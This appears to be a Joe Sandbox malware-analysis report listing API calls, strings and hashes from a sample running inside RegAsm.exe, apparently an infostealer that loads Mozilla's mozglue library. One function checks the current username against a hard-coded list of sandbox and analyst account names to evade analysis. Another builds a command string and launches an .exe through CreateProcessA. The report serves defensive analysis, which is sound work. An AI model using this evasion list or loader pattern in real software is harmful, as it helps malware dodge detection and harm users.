Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: CriticalSection$free$EnterLeavegetenv$CurrentExclusiveLockThread$AcquireInit_thread_footerReleasememset
String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING$MOZ_PROFILER_SHUTDOWN$[I %d/%d] profiler_shutdown
API String ID: 1340022502-4194431170
Opcode ID: a3eb0c8022b1ca7d257a6716c98bb531410f28d3484b43b2949c2745f8c5a0e1
Instruction ID: 421c2368b359a543b0854efec58ff99bcabe556d163b283002d85eb025121ff6
Opcode Fuzzy Hash: a3eb0c8022b1ca7d257a6716c98bb531410f28d3484b43b2949c2745f8c5a0e1
Instruction Fuzzy Hash: 9181F274B00100ABDB04DFA8C894B5E77F5BF4231CF540229E93697B86DB31E855EB9A

Function 6C0919A0 Relevance: 44.2, APIs: 24, Strings: 1, Instructions: 407COMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(6C10F760), ref: 6C0919BD
GetCurrentProcess.KERNEL32 ref: 6C0919E5
GetLastError.KERNEL32 ref: 6C091A27
moz_xmalloc.MOZGLUE(?), ref: 6C091A41
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C091A4F
GetLastError.KERNEL32 ref: 6C091A92
moz_xmalloc.MOZGLUE(?), ref: 6C091AAC
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C091ABA
LocalFree.KERNEL32(?), ref: 6C091C69
free.MOZGLUE(?), ref: 6C091C8F
free.MOZGLUE(?), ref: 6C091C9D
CloseHandle.KERNEL32(?), ref: 6C091CAE
ReleaseSRWLockExclusive.KERNEL32(6C10F760), ref: 6C091D52
GetLastError.KERNEL32 ref: 6C091DA5
GetLastError.KERNEL32 ref: 6C091DFB
GetLastError.KERNEL32 ref: 6C091E49
GetLastError.KERNEL32 ref: 6C091E68
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C091E9B

Part of subcall function 6C092070: LoadLibraryW.KERNEL32(combase.dll,6C091C5F), ref: 6C0920AE
Part of subcall function 6C092070: GetProcAddress.KERNEL32(00000000,CoInitializeSecurity), ref: 6C0920CD
Part of subcall function 6C092070: __Init_thread_footer.LIBCMT ref: 6C0920E1

memset.VCRUNTIME140(?,00000000,00000110), ref: 6C091F15
VerSetConditionMask.NTDLL ref: 6C091F46
VerSetConditionMask.NTDLL ref: 6C091F52
VerSetConditionMask.NTDLL ref: 6C091F59
VerSetConditionMask.NTDLL ref: 6C091F60
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C091F6D

Strings

D, xrefs: 6C091B57

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: ErrorLast$ConditionMask$freememset$ExclusiveLockmoz_xmalloc$AcquireAddressCloseCurrentFreeHandleInfoInit_thread_footerLibraryLoadLocalProcProcessReleaseVerifyVersion
String ID: D
API String ID: 290179723-2746444292
Opcode ID: 0f9b5d311b07162a94e3f4885e6a5e517bc91a78b73527a5aa99c9157a4a9032
Instruction ID: 603c01248c12bbd2b77141b7647572853e3d1cc75c64cd9221e1e84511f6654f
Opcode Fuzzy Hash: 0f9b5d311b07162a94e3f4885e6a5e517bc91a78b73527a5aa99c9157a4a9032
Instruction Fuzzy Hash: 84F17E71B01325ABEB209F65CC48B9AB7F8FF49704F104199E945A7650EB74EE80DFA0

Function 6C094470 Relevance: 43.9, APIs: 20, Strings: 5, Instructions: 178libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C094730: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C0944B2,6C10E21C,6C10F7F8), ref: 6C09473E
Part of subcall function 6C094730: GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C09474A

GetModuleHandleW.KERNEL32(WRusr.dll), ref: 6C0944BA
LoadLibraryW.KERNEL32(kernel32.dll), ref: 6C0944D2
InitOnceExecuteOnce.KERNEL32(6C10F80C,6C08F240,?,?), ref: 6C09451A
GetModuleHandleW.KERNEL32(user32.dll), ref: 6C09455C
LoadLibraryW.KERNEL32(?), ref: 6C094592
InitializeCriticalSection.KERNEL32(6C10F770), ref: 6C0945A2
moz_xmalloc.MOZGLUE(00000008), ref: 6C0945AA
moz_xmalloc.MOZGLUE(00000018), ref: 6C0945BB
InitOnceExecuteOnce.KERNEL32(6C10F818,6C08F240,?,?), ref: 6C094612
?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6C094636
LoadLibraryW.KERNEL32(user32.dll), ref: 6C094644
memset.VCRUNTIME140(?,00000000,00000114), ref: 6C09466D
VerSetConditionMask.NTDLL ref: 6C09469F
VerSetConditionMask.NTDLL ref: 6C0946AB
VerSetConditionMask.NTDLL ref: 6C0946B2
VerSetConditionMask.NTDLL ref: 6C0946B9
VerSetConditionMask.NTDLL ref: 6C0946C0
VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C0946CD
GetModuleHandleW.KERNEL32(00000000), ref: 6C0946F1
GetProcAddress.KERNEL32(00000000,NativeNtBlockSet_Write), ref: 6C0946FD

Strings

user32.dll, xrefs: 6C094557, 6C09463F
l, xrefs: 6C094578
NativeNtBlockSet_Write, xrefs: 6C0946F7
WRusr.dll, xrefs: 6C0944B5
kernel32.dll, xrefs: 6C0944CD

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: ConditionMask$HandleModuleOnce$LibraryLoad$AddressExecuteInitProcmoz_xmalloc$CriticalDown@mozilla@@InfoInitializeLockedSectionVerifyVersionWin32kmemset
String ID: NativeNtBlockSet_Write$WRusr.dll$kernel32.dll$l$user32.dll
API String ID: 1702738223-3894940629
Opcode ID: e630937b82c74cd7aa4bb868da7bd7edce7c6912f0113b6704e2cc117b3bc5d2
Instruction ID: 5d81981355a1be97b24ffd1c962d3f54dcdca2670aa6cedaccd0711f5384642e
Opcode Fuzzy Hash: e630937b82c74cd7aa4bb868da7bd7edce7c6912f0113b6704e2cc117b3bc5d2
Instruction Fuzzy Hash: B761F4B0B04348AFEB109FA0C84AB957BF8FF46308F04855DE9249B651DFB09A44DF61

Function 00424B17 Relevance: 42.1, APIs: 19, Strings: 5, Instructions: 109libraryloadermemoryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL), ref: 00424B1F
__mtterm.LIBCMT ref: 00424B2B

Part of subcall function 004247EA: DecodePointer.KERNEL32(FFFFFFFF), ref: 004247FB
Part of subcall function 004247EA: TlsFree.KERNEL32(FFFFFFFF), ref: 00424815

GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00424B41
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00424B4E
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00424B5B
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00424B68
TlsAlloc.KERNEL32 ref: 00424BB8
TlsSetValue.KERNEL32(00000000), ref: 00424BD3
__init_pointers.LIBCMT ref: 00424BDD
EncodePointer.KERNEL32 ref: 00424BEE
EncodePointer.KERNEL32 ref: 00424BFB
EncodePointer.KERNEL32 ref: 00424C08
EncodePointer.KERNEL32 ref: 00424C15
DecodePointer.KERNEL32(Function_0002496E), ref: 00424C36
__calloc_crt.LIBCMT ref: 00424C4B
DecodePointer.KERNEL32(00000000), ref: 00424C65
__initptd.LIBCMT ref: 00424C70
GetCurrentThreadId.KERNEL32 ref: 00424C77

Strings

FlsAlloc, xrefs: 00424B3B
KERNEL32.DLL, xrefs: 00424B1A
FlsSetValue, xrefs: 00424B50
FlsFree, xrefs: 00424B5D
FlsGetValue, xrefs: 00424B43

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Pointer$AddressEncodeProc$Decode$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 3732613303-3819984048
Opcode ID: c3e8602a75dcfac61e5a676cfef74acbdb1683745e949ee774a63f93a96c250c
Instruction ID: 9e7d6304cc20a0816a56486267aa260185140d132a286571763312e702071250
Opcode Fuzzy Hash: c3e8602a75dcfac61e5a676cfef74acbdb1683745e949ee774a63f93a96c250c
Instruction Fuzzy Hash: F7312C35E053609ADB23AF7ABD0860A3BA4EF85722B51063BE410D32B1DBB9D440DF5D

Function 6C0CE8B0 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 297threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 6C0C7090: ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,00000000,?,6C0CB9F1,?), ref: 6C0C7107

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C0CDCF5), ref: 6C0CE92D
GetCurrentThreadId.KERNEL32 ref: 6C0CEA4F
AcquireSRWLockExclusive.KERNEL32(6C10F4B8), ref: 6C0CEA5C
ReleaseSRWLockExclusive.KERNEL32(6C10F4B8), ref: 6C0CEA80
GetCurrentThreadId.KERNEL32 ref: 6C0CEA8A
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C0CDCF5), ref: 6C0CEA92
GetCurrentThreadId.KERNEL32 ref: 6C0CEB11
AcquireSRWLockExclusive.KERNEL32(6C10F4B8), ref: 6C0CEB1E
memset.VCRUNTIME140(?,00000000,000000E0), ref: 6C0CEB3C
ReleaseSRWLockExclusive.KERNEL32(6C10F4B8), ref: 6C0CEB5B

Part of subcall function 6C0C5710: ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C0CEB71), ref: 6C0C57AB

Part of subcall function 6C0BCBE8: GetCurrentProcess.KERNEL32(?,6C0831A7), ref: 6C0BCBF1
Part of subcall function 6C0BCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C0831A7), ref: 6C0BCBFA

Part of subcall function 6C0C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C094A68), ref: 6C0C945E
Part of subcall function 6C0C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C0C9470
Part of subcall function 6C0C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C0C9482
Part of subcall function 6C0C9420: __Init_thread_footer.LIBCMT ref: 6C0C949F

GetCurrentThreadId.KERNEL32 ref: 6C0CEBA4
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000), ref: 6C0CEBAC

Part of subcall function 6C0C94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C0C94EE
Part of subcall function 6C0C94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C0C9508

GetCurrentThreadId.KERNEL32 ref: 6C0CEBC1
AcquireSRWLockExclusive.KERNEL32(6C10F4B8,?,?,00000000), ref: 6C0CEBCE
?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000,?,?,00000000), ref: 6C0CEBE5
ReleaseSRWLockExclusive.KERNEL32(6C10F4B8,00000000), ref: 6C0CEC37
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C0CEC46
CloseHandle.KERNEL32(?), ref: 6C0CEC55
free.MOZGLUE(00000000), ref: 6C0CEC5C

Strings

[I %d/%d] profiler_start, xrefs: 6C0CEBB4
[I %d/%d] baseprofiler_save_profile_to_file(%s), xrefs: 6C0CEA9B

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$Current$ReleaseThread$Acquiregetenv$Process_getpid$?profiler_init@baseprofiler@mozilla@@CloseHandleInit_thread_footerObjectSingleTerminateWait__acrt_iob_func__stdio_common_vfprintffreemallocmemset
String ID: [I %d/%d] baseprofiler_save_profile_to_file(%s)$[I %d/%d] profiler_start
API String ID: 1341148965-1186885292
Opcode ID: 3c78910b1754e0e62ec515109c6a480cd469b9b9d3709d7f1774163f088c1b33
Instruction ID: 3547969324831a4305e4feff4404b24db3672f760253edd38926d8b3e250c2fd
Opcode Fuzzy Hash: 3c78910b1754e0e62ec515109c6a480cd469b9b9d3709d7f1774163f088c1b33
Instruction Fuzzy Hash: 9EA1F1317006048FDB10AF68C886BAE77F5FB86318F14412DE92997B91DF71A805DBA6

Function 00401927 Relevance: 36.8, APIs: 2, Strings: 19, Instructions: 56stringCOMMON

Download Yara Rule

APIs

GetUserNameA.ADVAPI32(?,?), ref: 00401A13
lstrcmpiA.KERNEL32(0043ABCC,?), ref: 00401A2E

Strings

maltest, xrefs: 004019D7
Miller, xrefs: 00401991
WDAGUtilityAccount, xrefs: 004019FF
Johnson, xrefs: 00401987
sandbox, xrefs: 004019C3
HAPUBWS, xrefs: 00401969
Sand box, xrefs: 00401955
timmy, xrefs: 004019AF
malware, xrefs: 004019CD
Hong Lee, xrefs: 00401973
test user, xrefs: 004019E1
Emily, xrefs: 0040195F
milozs, xrefs: 0040199B
John Doe, xrefs: 004019F5
user, xrefs: 004019B9
virus, xrefs: 004019EB
CurrentUser, xrefs: 0040194B
IT-ADMIN, xrefs: 0040197D
Peter Wilson, xrefs: 004019A5

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: NameUserlstrcmpi
String ID: CurrentUser$Emily$HAPUBWS$Hong Lee$IT-ADMIN$John Doe$Johnson$Miller$Peter Wilson$Sand box$WDAGUtilityAccount$maltest$malware$milozs$sandbox$test user$timmy$user$virus
API String ID: 542268695-1784693376
Opcode ID: a14623c780237b748c23d57be73366fad00cd6805492050cb9e0f9165e120a21
Instruction ID: b7e7ac9f27e83d335140a50ac772a364dc2a7579303695bb9c42e1fce2a6af08
Opcode Fuzzy Hash: a14623c780237b748c23d57be73366fad00cd6805492050cb9e0f9165e120a21
Instruction Fuzzy Hash: B42103B094526C8BCB20CF159D4C6DDBBB5AB5D308F00B1DAD1886A210C7B85ED9CF4D

Function 6C0CF6E0 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 235threadstringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C0C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C094A68), ref: 6C0C945E
Part of subcall function 6C0C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C0C9470
Part of subcall function 6C0C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C0C9482
Part of subcall function 6C0C9420: __Init_thread_footer.LIBCMT ref: 6C0C949F

GetCurrentThreadId.KERNEL32 ref: 6C0CF70E
??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6C0CF8F9

Part of subcall function 6C096390: GetCurrentThreadId.KERNEL32 ref: 6C0963D0
Part of subcall function 6C096390: AcquireSRWLockExclusive.KERNEL32 ref: 6C0963DF
Part of subcall function 6C096390: ReleaseSRWLockExclusive.KERNEL32 ref: 6C09640E

ReleaseSRWLockExclusive.KERNEL32(6C10F4B8), ref: 6C0CF93A
GetCurrentThreadId.KERNEL32 ref: 6C0CF98A
GetCurrentThreadId.KERNEL32 ref: 6C0CF990
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C0CF994
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C0CF716

Part of subcall function 6C0C94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C0C94EE
Part of subcall function 6C0C94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C0C9508

Part of subcall function 6C08B5A0: memcpy.VCRUNTIME140(?,?,?,?,00000000), ref: 6C08B5E0

GetCurrentThreadId.KERNEL32 ref: 6C0CF739
AcquireSRWLockExclusive.KERNEL32(6C10F4B8), ref: 6C0CF746
GetCurrentThreadId.KERNEL32 ref: 6C0CF793
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,6C10385B,00000002,?,?,?,?,?), ref: 6C0CF829
free.MOZGLUE(?,?,00000000,?), ref: 6C0CF84C
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?," attempted to re-register as ",0000001F,?,00000000,?), ref: 6C0CF866
free.MOZGLUE(?), ref: 6C0CFA0C

Part of subcall function 6C095E60: moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C0955E1), ref: 6C095E8C
Part of subcall function 6C095E60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C095E9D
Part of subcall function 6C095E60: GetCurrentThreadId.KERNEL32 ref: 6C095EAB
Part of subcall function 6C095E60: GetCurrentThreadId.KERNEL32 ref: 6C095EB8
Part of subcall function 6C095E60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C095ECF
Part of subcall function 6C095E60: moz_xmalloc.MOZGLUE(00000024), ref: 6C095F27
Part of subcall function 6C095E60: moz_xmalloc.MOZGLUE(00000004), ref: 6C095F47
Part of subcall function 6C095E60: GetCurrentProcess.KERNEL32 ref: 6C095F53
Part of subcall function 6C095E60: GetCurrentThread.KERNEL32 ref: 6C095F5C
Part of subcall function 6C095E60: GetCurrentProcess.KERNEL32 ref: 6C095F66
Part of subcall function 6C095E60: DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6C095F7E

free.MOZGLUE(?), ref: 6C0CF9C5
free.MOZGLUE(?), ref: 6C0CF9DA

Strings

[I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s, xrefs: 6C0CF9A6
Thread , xrefs: 6C0CF789
[D %d/%d] profiler_register_thread(%s), xrefs: 6C0CF71F
" attempted to re-register as ", xrefs: 6C0CF858

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: Current$Thread$ExclusiveLockfree$getenvmoz_xmallocstrlen$AcquireD@std@@MarkerProcessReleaseTextU?$char_traits@V?$allocator@V?$basic_string@_getpid$BlockBufferCategory@1@$$D@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@DuplicateHandleIndex@1@Init_thread_footerMarker@Marker@markers@01@Marker@markers@baseprofiler@mozilla@@Now@Options@1@ProfileProfilerStamp@mozilla@@StringTimeV12@_View@__acrt_iob_func__stdio_common_vfprintfmemcpy
String ID: " attempted to re-register as "$Thread $[D %d/%d] profiler_register_thread(%s)$[I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s
API String ID: 882766088-1834255612
Opcode ID: 9ae9ecd8831dcfa43fbf6b916574c4ba433ae181faff977b4817c3a190b5f250
Instruction ID: ac42b4abc2dc3754b3e5a3388c18257cdd78624463340206825ecd01353987ae
Opcode Fuzzy Hash: 9ae9ecd8831dcfa43fbf6b916574c4ba433ae181faff977b4817c3a190b5f250
Instruction Fuzzy Hash: C1810271B046009FDB10DF64C840BAEB7E9FF85308F54856DE8499BB51EB30A94ACB93

Function 0041260C Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 204stringprocesssynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

_memset.LIBCMT ref: 004127B1
lstrcatA.KERNEL32(?,?,?,?,?), ref: 004127C3
lstrcatA.KERNEL32(?,00436698), ref: 004127D5
lstrcatA.KERNEL32(?,6c8ce6f422a1d9cf34f23d1c2168e754), ref: 004127E7
lstrcatA.KERNEL32(?,0043669C), ref: 004127F9
lstrcatA.KERNEL32(?,?), ref: 00412809
lstrcatA.KERNEL32(?,004366A0), ref: 0041281B
lstrlenA.KERNEL32(?), ref: 00412824
lstrcatA.KERNEL32(?,EMPTY), ref: 00412840
lstrcatA.KERNEL32(?,004366AC), ref: 00412852
lstrcatA.KERNEL32(?,?), ref: 00412862
lstrcatA.KERNEL32(?,004366B0), ref: 00412874
lstrlenA.KERNEL32(?), ref: 00412881
_memset.LIBCMT ref: 004128B7

Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00412446: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00414A8D), ref: 00412460

CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000020,00000000,00000000,?,?,004366B4,?), ref: 00412924
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00412932

Strings

EMPTY, xrefs: 0041283A
6c8ce6f422a1d9cf34f23d1c2168e754, xrefs: 004127DB
.exe, xrefs: 0041264F

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$Create_memset$FileObjectProcessSingleSystemTimeWait
String ID: .exe$6c8ce6f422a1d9cf34f23d1c2168e754$EMPTY
API String ID: 141474312-3170798141
Opcode ID: 7423630355bc0ae080dcc3895a676b474c595fadf28ca0ec63f6465bb34c18d8
Instruction ID: 30b7237e4d63740a0c3ffa21d4e9ba1d0fd5571b7a7901b34f1eecf9535dda31
Opcode Fuzzy Hash: 7423630355bc0ae080dcc3895a676b474c595fadf28ca0ec63f6465bb34c18d8
Instruction Fuzzy Hash: 99814FB2E40129ABCF11EF61DD46ACD7779AB08309F4054BAB708B3051D679AFC98F58

